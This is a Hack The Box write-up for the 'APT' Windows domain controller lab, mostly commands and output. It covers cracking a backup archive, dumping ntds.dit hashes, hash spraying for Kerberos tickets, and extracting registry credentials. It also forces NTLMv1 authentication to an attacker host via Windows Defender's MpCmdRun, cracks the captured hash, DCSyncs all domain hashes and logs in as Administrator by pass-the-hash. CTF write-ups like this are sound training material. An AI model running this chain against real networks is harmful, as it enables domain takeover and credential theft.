jebidiah-anthony

write-ups and what not

HTB APT (10.10.10.213)



PART 1 : INITIAL RECON

1.1 NMAP scan

$ nmap --min-rate 3000 -oN nmap-tcp.initial -p- -Pn -T4 -v 10.10.10.213

  Host is up.
  All 65535 scanned ports on 10.10.10.213 are filtered

  Read data files from: /usr/bin/../share/nmap
  Nmap done: 1 IP address (1 host up) scanned in 65.54 seconds

No open port was found but scanning using IPv6 might yield a different result. But first, the IPv6 of the machine needs to be determined. It could be done using IOXIDResolver :

$ git clone https://github.com/mubix/IOXIDResolver.git

$ python3 IOXIDResolver/IOXIDResolver.py -t 10.10.10.213

  [*] Retrieving network interface of 10.10.10.213
  Address: apt
  Address: 10.10.10.213
  Address: dead:beef::b885:d62a:d679:573f
  Address: dead:beef::cda5:800b:148e:6594

Adding the recovered IPv6 addresses to the /etc/hosts file then attempting to scan using the new hostname:

 The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
dead:beef::b885:d62a:d679:573f	apt.htb#
$ nmap -6 --min-rate 3000 -oN nmap6-tcp.initial -p- -Pn -T4 -v apt.htb

  PORT      STATE SERVICE
  53/tcp    open  domain
  80/tcp    open  http
  135/tcp   open  msrpc
  389/tcp   open  ldap
  445/tcp   open  microsoft-ds
  464/tcp   open  kpasswd5
  593/tcp   open  http-rpc-epmap
  636/tcp   open  ldapssl
  5985/tcp  open  wsman
  9389/tcp  open  adws
  47001/tcp open  winrm

$ nmap -6 -oN nmap6-tcp -p 53,80,135,389,445,464,593,636,5985,9389,47001 -sC -sV -v apt.htb

  PORT      STATE SERVICE      VERSION
  53/tcp    open  domain       Simple DNS Plus
  80/tcp    open  http         Microsoft IIS httpd 10.0
  | http-methods:
  |   Supported Methods: OPTIONS TRACE GET HEAD POST
  |_  Potentially risky methods: TRACE
  |http-server-header: Microsoft-IIS/10.0
  |_http-title: Gigantic Hosting | Home
  135/tcp   open  msrpc        Microsoft Windows RPC
  389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
  | ssl-cert: Subject: commonName=apt.htb.local
  | Subject Alternative Name: DNS:apt.htb.local
  | Issuer: commonName=apt.htb.local
  | Public Key type: rsa
  | Public Key bits: 2048
  | Signature Algorithm: sha256WithRSAEncryption
  | Not valid before: 2020-09-24T07:07:18
  | Not valid after:  2050-09-24T07:17:18
  | MD5:   c743 dd92 e928 50b0 aa86 6f80 1b04 4d22
  |_SHA-1: f677 c290 98c0 2ac5 8575 7060 683d cdbc 5f86 5d45
  |_ssl-date: 2021-04-09T11:25:05+00:00; 0s from scanner time.
  445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
  464/tcp   open  kpasswd5?
  593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
  636/tcp   open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
  | ssl-cert: Subject: commonName=apt.htb.local
  | Subject Alternative Name: DNS:apt.htb.local
  | Issuer: commonName=apt.htb.local
  | Public Key type: rsa
  | Public Key bits: 2048
  | Signature Algorithm: sha256WithRSAEncryption
  | Not valid before: 2020-09-24T07:07:18
  | Not valid after:  2050-09-24T07:17:18
  | MD5:   c743 dd92 e928 50b0 aa86 6f80 1b04 4d22
  |_SHA-1: f677 c290 98c0 2ac5 8575 7060 683d cdbc 5f86 5d45
  |_ssl-date: 2021-04-09T11:25:05+00:00; 0s from scanner time.
  5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  |_http-server-header: Microsoft-HTTPAPI/2.0
  |_http-title: Not Found
  9389/tcp  open  mc-nmf       .NET Message Framing
  47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  |_http-server-header: Microsoft-HTTPAPI/2.0
  |_http-title: Not Found
  Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows

  Host script results:
  |_clock-skew: mean: -11m59s, deviation: 26m49s, median: 0s
  | smb-os-discovery:
  |   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
  |   Computer name: apt
  |   NetBIOS computer name: APT\x00
  |   Domain name: htb.local
  |   Forest name: htb.local
  |   FQDN: apt.htb.local
  |  System time: 2021-04-09T12:24:49+01:00
  | smb-security-mode:
  |   account_used: <blank>
  |   authentication_level: user
  |   challenge_response: supported
  |_  message_signing: required
  | smb2-security-mode:
  |   2.02:
  |_    Message signing enabled and required
  | smb2-time:
  |   date: 2021-04-09T11:24:51
  |_  start_date: 2021-04-09T07:46:49

Open ports have now been determined and it seems like the machine is part of an Active Directory.

1.2 Updating /etc/hosts

 The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
dead:beef::b885:d62a:d679:573f	##apt.htb.local HTB.local# apt.htb

This might be essential when enumerating/connecting to the machine.


PART 2 : PORT ENUMERATION

TCP PORT 80 : HTTP

GiganticHosting

TCP PORT 445 : SMB

Enumerating available shares from anonymous login:

$ smbclient -L \\\\apt.htb -N

  Anonymous login successful

  	  Sharename       Type      Comment
  	  ---------       ----      -------
	  backup          Disk
	  IPC$            IPC       Remote IPC
	  NETLOGON        Disk      Logon server share
	  SYSVOL          Disk      Logon server share
  apt.htb is an IPv6 address -- no workgroup available

$ smbclient \\\\apt.htb\\backup -N

  smb: \> dir
    .                                   D        0  Thu Sep 24 03:30:52 2020
    ..                                  D        0  Thu Sep 24 03:30:52 2020
    backup.zip                          A 10650961  Thu Sep 24 03:30:32 2020

There is a backup.zip file publicly available in the backup share.

$ smbget -a -R smb://apt.htb/backup/backup.zip

  Using workgroup WORKGROUP, guest user
  smb://apt.htb/backup/backup.zip
  Downloaded 10.16MB in 37 seconds

$ unzip backup.zip

  Archive:  backup.zip
     creating: Active Directory/
  [backup.zip] Active Directory/ntds.dit password:

$ fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt backup.zip

  PASSWORD FOUND!!!!: pw == iloveyousomuch

The backup.zip file was successfully downloaded from the file share but trying to extract the contents requires a password. Luckily, the password was susceptible to a dictionary attack which returned the password as iloveyousomuch. Successfully extracting the contents reveals the following files:

$ unzip backup.zip

  Archive:  backup.zip
  [backup.zip] Active Directory/ntds.dit password: iloveyousomuch
    inflating: Active Directory/ntds.dit
    inflating: Active Directory/ntds.jfm
     creating: registry/
    inflating: registry/SECURITY
    inflating: registry/SYSTEM

$ find . -type f -exec file {} + 2>/dev/null | grep -v backup

  ./Active Directory/ntds.dit: Extensible storage engine DataBase, version 0x620, checksum 0x6f146ad6, page size 8192, Windows version 10.0
  ./Active Directory/ntds.jfm: data
  ./registry/SECURITY:         MS Windows registry file, NT/2000 or above
  ./registry/SYSTEM:           MS Windows registry file, NT/2000 or above

There’s an ntds.dit file which is a database file storing Active Directory data especially user objects and password hashes; however, it’s encrypted. Along with this are Windows Registry files.


PART 3: EXPLOITATION

3.1 Search for valid users

$ impacket-secretsdump -ntds Active\ Directory/ntds.dit -system registry/SYSTEM -outputfile user_hashes.txt LOCAL

$ ls -l

  -rwxrwxrwx 1 root root   176132 xxx  x xx:xx  user_hashes.txt.ntds
  -rwxrwxrwx 1 root root      136 xxx  x xx:xx  user_hashes.txt.ntds.cleartext
  -rwxrwxrwx 1 root root   433995 xxx  x xx:xx  user_hashes.txt.ntds.kerberos

The extraction is only possible since the password encryption key used for ntds.dit is encrypted using the BOOTKEY which could be found on the SYSTEM registry hive. Otherwise, if the SYSTEM hive is not available, the bootkey could be provided as an argument to secretsdump module of impacket.

$ cat user_hashes.txt.ntds | head -n 1

  Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::

$ cat user_hashes.txt.ntds | head -n 1 | cut -d':' -f1

  Administrator

$ cat user_hashes.txt.ntds | cut -d':' -f1 > ../usernames.txt

$ ./kerbrute_linux_amd64 userenum -d htb.local --dc apt.htb.local -o kerbrute.txt -v usernames.txt
      __             __               __
     / /_____  _____/ /_  _______  __/ /____
    / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
   / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
  /_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

  Version: v1.0.3 (9dad6e1) - xx/xx/xx - Ronnie Flathers @ropnop

  xxxx/xx/xx xx:xx:xx >  Using KDC(s):
  xxxx/xx/xx xx:xx:xx >  	apt.htb.local:88
  [...omitted...]

$ cat kerbrute.txt | grep VALID

  xxxx/xx/xx xx:xx:xx >  [+] VALID USERNAME:	 [email protected]
  xxxx/xx/xx xx:xx:xx >  [+] VALID USERNAME:	 [email protected]
  xxxx/xx/xx xx:xx:xx >  [+] VALID USERNAME:	 [email protected]

The usernames were trimmed from the password hashes recovered in ntds.dit via impacket-secretsdump. The usernames were then passed through kerbrute to check if they were still valid/active users in the domain controller. As for that, three users were found — Administrator, APT$, and henry.vinson.

3.2 Generating a Kerberos Ticket for henry.vinson

The hashes found for the valid users doesn’t seem to work when attempting to login via winrm. Since this box seems to be part of an Active Directory, maybe forging a kerberos ticket will work for authenticating into the machine.

$ cat user_hashes.txt.ntds | grep henry.vinson

  henry.vinson:3647:aad3b435b51404eeaad3b435b51404ee:2de80758521541d19cabba480b260e8f:::

$ cat user_hashes.txt.ntds | grep henry.vinson | awk -F':' '{printf "%s:%s\n",$3,$4}'

  aad3b435b51404eeaad3b435b51404ee:2de80758521541d19cabba480b260e8f

$ cat user_hashes.txt.ntds | awk -F':' '{printf "%s:%s\n",$3,$4}' | sort | uniq > ../hashes.txt

$ for i in $(cat hashes.txt); do echo $i; attempt=$(impacket-getTGT HTB.local/[email protected] -hashes $i); if ! [[ $attempt == "SessionError" ]]; then echo "HASH FOUND: [$i]"; echo $attempt; break; fi; done

  [...omitted...]
  HASH FOUND: [aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb]
  Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

  [*] Saving ticket in [email protected]

$ klist -c [email protected]

  Ticket cache: FILE:[email protected]
  Default principal: [email protected]

  Valid starting       Expires              Service principal
  xx/xx/xxxx xx:xx:xx  xx/xx/xxxx xx:xx:xx  krbtgt/[email protected]
  	  renew until xx/xx/xxxx xx:xx:xx

The shell script below was the one-liner used to brute force the generation of the ticket:

for i in $(cat hashes.txt); do
    echo $i;
    attempt=$(impacket-getTGT HTB.local/[email protected] -hashes $i);

    if ! [[ $attempt == "SessionError" ]]; then
        echo "HASH FOUND: [$i]";
        echo $attempt;
        break;
    fi;
done

A password spray (in this case, hashes extracted from ntds.dit were used) was attempted for the user, henry.vinson, and one of the hashes (not his own) was found to be able to forge a krbtgt ticket. However, this still does not seem to work for authentication via WinRM.

3.3 Dumping HKEY_USERS

The HKU registry hive contains all configurations set for all active users.

$ export KRB5CCNAME=[email protected]

$ env | grep KRB5

  KRB5CCNAME=[email protected]

$ impacket-reg -k apt.htb.local query -keyName HKU -s > registry.txt

In this case, since there is already a cached ticket for henry.vinson, all contents from his user registry hive will be extracted.

$ cat registry.txt | grep -i -A5 -B5 -E 'henry'

  [...omitted...]
  \Software\GiganticHostingManagementSystem\
	        UserName	REG_SZ	 henry.vinson_adm
	        PassWord	REG_SZ	 G1#[email protected]
  [...omitted...]

And within the extracted information are stored credentials for the deployed service, GiganticHostingManagementSystem.


PART 4 : GENERATING A USER SHELL (henry.vinson_adm)

$ evil-winrm -i apt.htb -u henry.vinson_adm -p 'G1#[email protected]' --no-colors

PS C:\Users\henry.vinson_adm\Documents> whoami

  htb\henry.vinson_adm

PS C:\Users\henry.vinson_adm\Documents> ipconfig

  Windows IP Configuration


  Ethernet adapter Ethernet:

     Connection-specific DNS Suffix  . :
     IPv6 Address. . . . . . . . . . . : dead:beef::3d05:a1a8:4a51:c2fe
     IPv6 Address. . . . . . . . . . . : dead:beef::b885:d62a:d679:573f
     Link-local IPv6 Address . . . . . : fe80::3d05:a1a8:4a51:c2fe%5
     IPv4 Address. . . . . . . . . . . : 10.10.10.213
     Subnet Mask . . . . . . . . . . . : 255.255.255.0
     Default Gateway . . . . . . . . . : dead:beef::1
                                         fe80::250:56ff:feb9:75a0%5
                                         10.10.10.2

PS C:\Users\henry.vinson_adm\Documents> dir ..\Desktop

      Directory: C:\Users\henry.vinson_adm\Desktop


  Mode                LastWriteTime         Length Name
  ----                -------------         ------ ----
  -ar---       xx/xx/xxxx  xx:xx XX             34 user.txt

It seems like the reason why the other users cannot authenticate via WinRM even though a valid hash has been found is that they are not part of the Remote Management Users group:

PS C:\Users\henry.vinson_adm\Documents> net localgroup "Remote Management Users"

  Alias name     Remote Management Users
  Comment        Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.

  Members

  -------------------------------------------------------------------------------
  henry.vinson_adm

PART 5 : PRIVILEGE ESCALATION (henry.vinson_adm → Administrator)

5.1 The console history of henry.vinson_adm

Checking the console history of the current user:

PS C:\Users\henry.vinson_adm\Documents> cd ..\AppData

PS C:\Users\henry.vinson_adm\AppData> type Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
$Cred = get-credential administrator
invoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}

The DWORD value for lmcompatibilitylevel was set to 2 and based on the Microsoft documentation for LAN Manager authentication level:

DWORD Setting Description

2

Send NTLM response only

Client devices use NTLMv1 authentication, and they use NTLMv2 session security if the server supports it. Domain controllers accept LM, NTLM, and NTLMv2 authentication.

With this the machine should only repond with NTLMv1 hashes during authentication.

5.2 Intercepting NTLMv1 Hashes

Setting up responder with a custom challenge, "1122334455667788"

$ cat /etc/responder/Responder.conf | grep -i challenge

  ; Custom challenge.
  ; Use "Random" for generating a random challenge for each requests (Default)
  Challenge = 1122334455667788

$ sudo responder -I tun0 --lm

                                           __
    .----.-----.-----.-----.-----.-----.--|  |.-----.----.
    |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
    |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                     |__|

             NBT-NS, LLMNR & MDNS Responder 3.0.2.0

    Author: Laurent Gaffie ([email protected])
    To kill this script hit CTRL-C

    [...omitted...]
    [+] Servers:
        [...omitted...]
        SMB server                 [ON]
    [...omitted...]

    [+] Poisoning Options:
        [...omitted...]
        Force LM downgrade         [ON]
    [...omitted...]

    [+] Generic Options:
        Responder NIC              [tun0]
        Responder IP               [10.10.14.11]
        Challenge set              [1122334455667788]
    [...omitted...]

Then forcing the target machine to force NTLM authentication:

PS C:\Users\henry.vinson_adm\AppData> cd "C:\ProgramData\Microsoft\Windows Defender\platform"

PS C:\ProgramData\Microsoft\Windows Defender\platform> dir


      Directory: C:\ProgramData\Microsoft\Windows Defender\platform


  Mode                LastWriteTime         Length Name
  ----                -------------         ------ ----
  d-----       11/10/2020  11:09 AM                4.18.2010.7-0
  d-----        3/17/2021   3:13 PM                4.18.2102.4-0

PS C:\ProgramData\Microsoft\Windows Defender\platform> cd 4.18.2010.7-0

PS C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0> .\MpCmdRun.exe -Scan -ScanType 3 -File \\10.10.14.11\file.txt

Looking back in the running responder, the NTLMv1 hash for the computer account was retrieved:

[SMB] NTLMv1 Client   : 10.10.10.213
[SMB] NTLMv1 Username : HTB\APT$
[SMB] NTLMv1 Hash     : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[...omitted...]
PS C:\Users\henry.vinson_adm\Documents> Get-ADComputer "APT"

  DistinguishedName : CN=APT,OU=Domain Controllers,DC=htb,DC=local
  DNSHostName       : apt.htb.local
  Enabled           : True
  Name              : APT
  ObjectClass       : computer
  ObjectGUID        : a78acf4d-42b5-49bc-9855-2389a80e726d
  SamAccountName    : APT$
  SID               : S-1-5-21-2993095098-2100462451-206186470-1001
  UserPrincipalName :

Going to crack.sh and submitting the value, NTHASH:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384, will return the following if the hash was successfully cracked:

Token: $NETNTLM$1122334455667788$95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384
Key: d167c3238864b12f5f82feae86a7f798

5.3 Running impacket-secretsdump to obtain password hashes

$ impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798 'HTB.local/[email protected]'

  Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

  [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
  [] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
  [] Using the DRSUAPI method to get NTDS.DIT secrets
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  krbtgt:502:aad3b435b51404eeaad3b435b51404ee:738f00ed06dc528fd7ebb7a010e50849:::
  DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb:::
  henry.vinson_adm:1106:aad3b435b51404eeaad3b435b51404ee:4cd0db9103ee1cf87834760a34856fef:::
  APT$:1001:aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798:::
  [] Kerberos keys grabbed
  Administrator:aes256-cts-hmac-sha1-96:72f9fc8f3cd23768be8d37876d459ef09ab591a729924898e5d9b3c14db057e3
  Administrator:aes128-cts-hmac-sha1-96:a3b0c1332eee9a89a2aada1bf8fd9413
  Administrator:des-cbc-md5:0816d9d052239b8a
  krbtgt:aes256-cts-hmac-sha1-96:b63635342a6d3dce76fcbca203f92da46be6cdd99c67eb233d0aaaaaa40914bb
  krbtgt:aes128-cts-hmac-sha1-96:7735d98abc187848119416e08936799b
  krbtgt:des-cbc-md5:f8c26238c2d976bf
  henry.vinson:aes256-cts-hmac-sha1-96:63b23a7fd3df2f0add1e62ef85ea4c6c8dc79bb8d6a430ab3a1ef6994d1a99e2
  henry.vinson:aes128-cts-hmac-sha1-96:0a55e9f5b1f7f28aef9b7792124af9af
  henry.vinson:des-cbc-md5:73b6f71cae264fad
  henry.vinson_adm:aes256-cts-hmac-sha1-96:f2299c6484e5af8e8c81777eaece865d54a499a2446ba2792c1089407425c3f4
  henry.vinson_adm:aes128-cts-hmac-sha1-96:3d70c66c8a8635bdf70edf2f6062165b
  henry.vinson_adm:des-cbc-md5:5df8682c8c07a179
  APT$:aes256-cts-hmac-sha1-96:4c318c89595e1e3f2c608f3df56a091ecedc220be7b263f7269c412325930454
  APT$:aes128-cts-hmac-sha1-96:bf1c1795c63ab278384f2ee1169872d9
  APT$:des-cbc-md5:76c45245f104a4bf
  [] Cleaning up...

5.4 Shell as Administrator

$ evil-winrm -i apt.htb -u Administrator -H c370bddf384a691d811ff3495e8a72e2 --no-colors

PS C:\Users\Administrator\Documents> whoami

  htb\administrator

PS C:\Users\Administrator\Documents> dir ..\Desktop


      Directory: C:\Users\Administrator\Desktop


  Mode                LastWriteTime         Length Name
  ----                -------------         ------ ----
  -ar---       xx/xx/xxxx  xx:xx XX             34 root.txt


PS C:\Users\Administrator\Documents> ipconfig

  Windows IP Configuration


  Ethernet adapter Ethernet:

     Connection-specific DNS Suffix  . :
     IPv6 Address. . . . . . . . . . . : dead:beef::3d05:a1a8:4a51:c2fe
     IPv6 Address. . . . . . . . . . . : dead:beef::b885:d62a:d679:573f
     Link-local IPv6 Address . . . . . : fe80::3d05:a1a8:4a51:c2fe%5
     IPv4 Address. . . . . . . . . . . : 10.10.10.213
     Subnet Mask . . . . . . . . . . . : 255.255.255.0
     Default Gateway . . . . . . . . . : dead:beef::1
                                         fe80::250:56ff:feb9:75a0%5
                                         10.10.10.2